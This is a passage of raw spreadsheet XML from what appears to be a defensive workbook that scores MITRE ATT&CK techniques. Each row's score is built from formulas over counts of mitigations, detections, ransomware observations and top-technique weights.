      <c r="AU55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57" spans="1:47" ht="32.1">
      <c r="A557" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B557" s="25">
        <f>SUM(H557,M557,V557)*(1+SUM(AE557,AG557,AI557,AK557,AM557))</f>
        <v>0.05</v>
      </c>
      <c r="C557" s="25" t="s">
        <v>1928</v>
      </c>
      <c r="D557" s="25" t="s">
        <v>410</v>
      </c>
      <c r="E557" s="25" t="s">
        <v>1925</v>
      </c>
      <c r="F557" s="51">
        <v>0</v>
      </c>
      <c r="G557" s="51">
        <v>1</v>
      </c>
      <c r="H557" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I557">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J557">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K557">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L557">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M557" s="25">
        <v>0</v>
      </c>
      <c r="N557" s="51">
        <v>0</v>
      </c>
      <c r="O557" s="51">
        <v>0</v>
      </c>
      <c r="P557" s="51">
        <v>0</v>
      </c>
      <c r="Q557" s="51">
        <v>0</v>
      </c>
      <c r="R557" s="51"/>
      <c r="S557" s="51">
        <v>0</v>
      </c>
      <c r="T557" s="51"/>
      <c r="U557" s="51">
        <v>0</v>
      </c>
      <c r="V557" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W557">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X557">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y557">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z557">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA557">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB557">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC557" s="29" t="s">
        <v>1929</v>
      </c>
      <c r="AD557" s="25" t="str" cm="1">
        <f t="array" ref="AD557">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC557)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE557" s="25">
        <f>IF(AD557="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF557" s="25" t="str" cm="1">
        <f t="array" ref="AF557">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC557)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG557" s="25">
        <f>IF(AF557="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH557" s="25" t="str" cm="1">
        <f t="array" ref="AH557">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC557)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI557" s="25">
        <f>IF(AH557="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ557" s="25" t="str" cm="1">
        <f t="array" ref="AJ557">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC557)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK557" s="25">
        <f>IF(AJ557="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL557" s="25" t="str" cm="1">
        <f t="array" ref="AL557">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC557)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM557" s="25">
        <f>IF(AL557="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN557" s="52">
        <v>0</v>
      </c>
      <c r="AO557" s="51">
        <v>0</v>
      </c>
      <c r="AP557" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ557" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR557" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS557" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT557" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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58" spans="1:47" ht="32.1">
      <c r="A558" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B558" s="25">
        <f>SUM(H558,M558,V558)*(1+SUM(AE558,AG558,AI558,AK558,AM558))</f>
        <v>0.05</v>
      </c>
      <c r="C558" s="25" t="s">
        <v>1930</v>
      </c>
      <c r="D558" s="25" t="s">
        <v>410</v>
      </c>
      <c r="E558" s="25" t="s">
        <v>1910</v>
      </c>
      <c r="F558" s="51">
        <v>0</v>
      </c>
      <c r="G558" s="51">
        <v>1</v>
      </c>
      <c r="H558" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I558">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J558">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K558">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L558">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M558" s="25">
        <v>0</v>
      </c>
      <c r="N558" s="51">
        <v>0</v>
      </c>
      <c r="O558" s="51">
        <v>0</v>
      </c>
      <c r="P558" s="51">
        <v>0</v>
      </c>
      <c r="Q558" s="51">
        <v>0</v>
      </c>
      <c r="R558" s="51"/>
      <c r="S558" s="51">
        <v>0</v>
      </c>
      <c r="T558" s="51"/>
      <c r="U558" s="51">
        <v>0</v>
      </c>
      <c r="V558" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W558">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X558">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y558">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z558">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA558">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB558">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC558" s="29" t="s">
        <v>1705</v>
      </c>
      <c r="AD558" s="25" t="str" cm="1">
        <f t="array" ref="AD558">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC558)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE558" s="25">
        <f>IF(AD558="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF558" s="25" t="str" cm="1">
        <f t="array" ref="AF558">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC558)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG558" s="25">
        <f>IF(AF558="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH558" s="25" t="str" cm="1">
        <f t="array" ref="AH558">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC558)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI558" s="25">
        <f>IF(AH558="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ558" s="25" t="str" cm="1">
        <f t="array" ref="AJ558">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC558)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK558" s="25">
        <f>IF(AJ558="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL558" s="25" t="str" cm="1">
        <f t="array" ref="AL558">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC558)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM558" s="25">
        <f>IF(AL558="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN558" s="60">
        <v>0</v>
      </c>
      <c r="AO558" s="51">
        <v>0</v>
      </c>
      <c r="AP558" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ558" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR558" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS558" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT558" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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59" spans="1:47">
      <c r="A559" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B559" s="25">
        <f>SUM(H559,M559,V559)*(1+SUM(AE559,AG559,AI559,AK559,AM559))</f>
        <v>0.05</v>
      </c>
      <c r="C559" s="25" t="s">
        <v>1931</v>
      </c>
      <c r="D559" s="25" t="s">
        <v>410</v>
      </c>
      <c r="E559" s="25" t="s">
        <v>1912</v>
      </c>
      <c r="F559" s="51">
        <v>0</v>
      </c>
      <c r="G559" s="51">
        <v>1</v>
      </c>
      <c r="H559" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I559">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J559">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K559">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L559">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M559" s="25">
        <v>0</v>
      </c>
      <c r="N559" s="51">
        <v>0</v>
      </c>
      <c r="O559" s="51">
        <v>0</v>
      </c>
      <c r="P559" s="51">
        <v>0</v>
      </c>
      <c r="Q559" s="51">
        <v>0</v>
      </c>
      <c r="R559" s="51"/>
      <c r="S559" s="51">
        <v>0</v>
      </c>
      <c r="T559" s="51"/>
      <c r="U559" s="51">
        <v>0</v>
      </c>
      <c r="V559" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W559">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X559">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y559">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z559">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA559">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB559">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC559" s="29" t="s">
        <v>1932</v>
      </c>
      <c r="AD559" s="25" t="str" cm="1">
        <f t="array" ref="AD559">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC559)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE559" s="25">
        <f>IF(AD559="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF559" s="25" t="str" cm="1">
        <f t="array" ref="AF559">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC559)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG559" s="25">
        <f>IF(AF559="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH559" s="25" t="str" cm="1">
        <f t="array" ref="AH559">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC559)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI559" s="25">
        <f>IF(AH559="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ559" s="25" t="str" cm="1">
        <f t="array" ref="AJ559">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC559)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK559" s="25">
        <f>IF(AJ559="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL559" s="25" t="str" cm="1">
        <f t="array" ref="AL559">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC559)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM559" s="25">
        <f>IF(AL559="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN559" s="52">
        <v>0</v>
      </c>
      <c r="AO559" s="51">
        <v>0</v>
      </c>
      <c r="AP559" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ559" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR559" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS559" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT559" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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60" spans="1:47">
      <c r="A560" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B560" s="25">
        <f>SUM(H560,M560,V560)*(1+SUM(AE560,AG560,AI560,AK560,AM560))</f>
        <v>0.05</v>
      </c>
      <c r="C560" s="25" t="s">
        <v>1933</v>
      </c>
      <c r="D560" s="25" t="s">
        <v>410</v>
      </c>
      <c r="E560" s="25" t="s">
        <v>1927</v>
      </c>
      <c r="F560" s="51">
        <v>0</v>
      </c>
      <c r="G560" s="51">
        <v>1</v>
      </c>
      <c r="H560" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I560">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J560">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K560">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L560">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M560" s="25">
        <v>0</v>
      </c>
      <c r="N560" s="51">
        <v>0</v>
      </c>
      <c r="O560" s="51">
        <v>0</v>
      </c>
      <c r="P560" s="51">
        <v>0</v>
      </c>
      <c r="Q560" s="51">
        <v>0</v>
      </c>
      <c r="R560" s="51"/>
      <c r="S560" s="51">
        <v>0</v>
      </c>
      <c r="T560" s="51"/>
      <c r="U560" s="51">
        <v>0</v>
      </c>
      <c r="V560" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W560">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X560">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y560">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z560">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA560">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB560">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC560" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD560" s="25" t="str" cm="1">
        <f t="array" ref="AD560">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC560)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE560" s="25">
        <f>IF(AD560="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF560" s="25" t="str" cm="1">
        <f t="array" ref="AF560">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC560)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG560" s="25">
        <f>IF(AF560="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH560" s="25" t="str" cm="1">
        <f t="array" ref="AH560">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC560)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI560" s="25">
        <f>IF(AH560="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ560" s="25" t="str" cm="1">
        <f t="array" ref="AJ560">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC560)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK560" s="25">
        <f>IF(AJ560="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL560" s="25" t="str" cm="1">
        <f t="array" ref="AL560">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC560)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM560" s="25">
        <f>IF(AL560="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN560" s="60">
        <v>0</v>
      </c>
      <c r="AO560" s="51">
        <v>0</v>
      </c>
      <c r="AP560" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="AQ560" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR560" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS560" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT560" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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61" spans="1:47">
      <c r="A561" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0000000000000001E-3</v>
      </c>
      <c r="B561" s="25">
        <f>SUM(H561,M561,V561)*(1+SUM(AE561,AG561,AI561,AK561,AM561))</f>
        <v>0.05</v>
      </c>
      <c r="C561" s="25" t="s">
        <v>1934</v>
      </c>
      <c r="D561" s="25" t="s">
        <v>410</v>
      </c>
      <c r="E561" s="25" t="s">
        <v>1885</v>
      </c>
      <c r="F561" s="51">
        <v>0</v>
      </c>
      <c r="G561" s="51">
        <v>1</v>
      </c>
      <c r="H561" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I561">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J561">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K561">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L561">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M561" s="25">
        <v>0</v>
      </c>
      <c r="N561" s="51">
        <v>0</v>
      </c>
      <c r="O561" s="51">
        <v>0</v>
      </c>
      <c r="P561" s="51">
        <v>0</v>
      </c>
      <c r="Q561" s="51">
        <v>0</v>
      </c>
      <c r="R561" s="51"/>
      <c r="S561" s="51">
        <v>0</v>
      </c>
      <c r="T561" s="51"/>
      <c r="U561" s="51">
        <v>0</v>
      </c>
      <c r="V561" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W561">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X561">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y561">
